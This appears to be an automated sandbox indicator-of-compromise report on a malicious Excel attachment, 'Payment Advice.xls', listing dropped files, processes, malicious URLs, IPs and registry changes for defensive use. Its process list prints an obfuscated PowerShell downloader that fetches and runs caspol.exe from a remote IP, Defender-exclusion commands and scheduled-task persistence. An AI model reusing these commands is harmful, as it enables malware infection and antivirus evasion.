IOC Report
Payment Advice.xls

loading gif

Files

File Path
Type
Category
Malicious
Payment Advice.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 01:29:52 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\~DF6CCF4596F2406470.TMP
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\caspol.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\Desktop\Payment Advice.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B39E307.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5987A0CE.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68BFBA8B.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A869FC32.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDA2DB10.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1ajzdp3d.tf5.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4cy2gzqu.2hf.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\53o4551w.x5q.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\5dlmlx1m.vsq.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx
Microsoft Excel 2007+
dropped
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\RES37A5.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:56:43 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESB0AA.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:57:14 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\c2d4zi2l.bv3.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\cdwye0yl.4lp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\fb0memo4.k4k.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\fc3stk3r.wb1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\fcvcdj1d.wrn.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
dropped
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\jpbm12t2.u2x.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jx4thbox.b5z.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\k2ueiyvl.ktr.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\kiv1dtcn.j4h.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mnwb31g4.t0h.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\tmp1F44.tmp
XML 1.0 document, ASCII text
dropped
C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp
XML 1.0 document, ASCII text
dropped
C:\Users\user\AppData\Local\Temp\txysfggx.pwo.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\z3hjfgw1.zmc.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zedpap0h.oz0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zkybtyb3.12m.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
dropped
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\zwyw2omb.eeq.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zzpagiam.5a2.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF6D08248E007BBF07.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFB2E53F3C936E1C95.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFE43205A127440685.TMP
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
data
dropped
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
data
dropped
C:\Users\user\Desktop\CA430000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
dropped
C:\Users\user\Desktop\CA430000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 51 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
malicious
C:\Users\user\AppData\Roaming\caspol.exe
"C:\Users\user\AppData\Roaming\caspol.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
malicious
C:\Users\user\AppData\Roaming\caspol.exe
"C:\Users\user\AppData\Roaming\caspol.exe"
malicious
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
malicious
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
"C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
malicious
C:\Users\user\AppData\Roaming\caspol.exe
"C:\Users\user\AppData\Roaming\caspol.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
malicious
C:\Users\user\AppData\Roaming\caspol.exe
"C:\Users\user\AppData\Roaming\caspol.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
C:\Windows\System32\taskeng.exe
taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
There are 18 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
192.3.243.136
malicious
94.156.177.41/simple/five/fre.php
malicious
http://192.3.243.136/55/caspol.exe
192.3.243.136
malicious
http://94.156.177.41/simple/five/fre.php
94.156.177.41
malicious
http://192.3.243.136/
unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta
unknown
https://provit.uk/~
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..
unknown
http://crl.entrust.n?
unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/k
unknown
http://ocsp.entrust.net03
unknown
http://www.ibsensoftware.com/
unknown
https://contoso.com/License
unknown
https://provit.uk/
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavf
unknown
http://go.micros
unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0k
unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvc
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:
unknown
http://192.3.243.136/55/caspol.exep
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZf
unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion
198.244.140.41
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadf
unknown
http://nuget.org/NuGet.exe
unknown
http://192.3.243.136/55/caspol.e
unknown
http://kbfvzoboss.bid/alien/fre.php
http://crl.entrust.net/server1.crl0
unknown
http://alphastand.top/alien/fre.php
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion2
unknown
https://provit.uk/J
unknown
https://contoso.com/Icon
unknown
http://alphastand.win/alien/fre.php
http://alphastand.trade/alien/fre.php
https://provit.uk/:
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta38
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namep5W
unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionket
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV8
unknown
http://192.3.243.136/55/caspol.exe6
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHf
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=8
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$1
unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion?
unknown
https://secure.comodo.com/CPS0
unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht
unknown
http://crl.entrust.net/2048ca.crl0
unknown
There are 43 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
provit.uk
198.244.140.41

IPs

IP
Domain
Country
Malicious
192.3.243.136
unknown
United States
malicious
94.156.177.41
unknown
Bulgaria
malicious
198.244.140.41
provit.uk
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
v;/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2A44A
2A44A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{"/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\36E8B
36E8B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\377BF
377BF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38594
38594
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
